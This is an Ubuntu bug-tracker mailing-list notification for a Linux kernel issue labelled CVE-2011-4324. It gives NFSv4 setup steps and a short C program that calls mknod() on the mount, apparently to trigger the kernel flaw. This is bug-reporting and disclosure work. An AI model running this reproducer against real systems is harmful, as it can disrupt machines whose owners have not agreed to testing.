Did install nfs-kernel-server and export a dir via 127.0.0.1, then
mounted that as nfs4 mount and run the following code in that dir (touch
can normally create files):

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>

int main(void)
{
        int fd;

        fd = mknod("bla", S_IFREG, 0);

        if(fd >= 0)
                close(fd);
        return 0;
}

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/917829

Title:
  CVE-2011-4324

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/917829/+subscriptions

-- 
ubuntu-bugs mailing list
[email protected]
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs

Reply via email to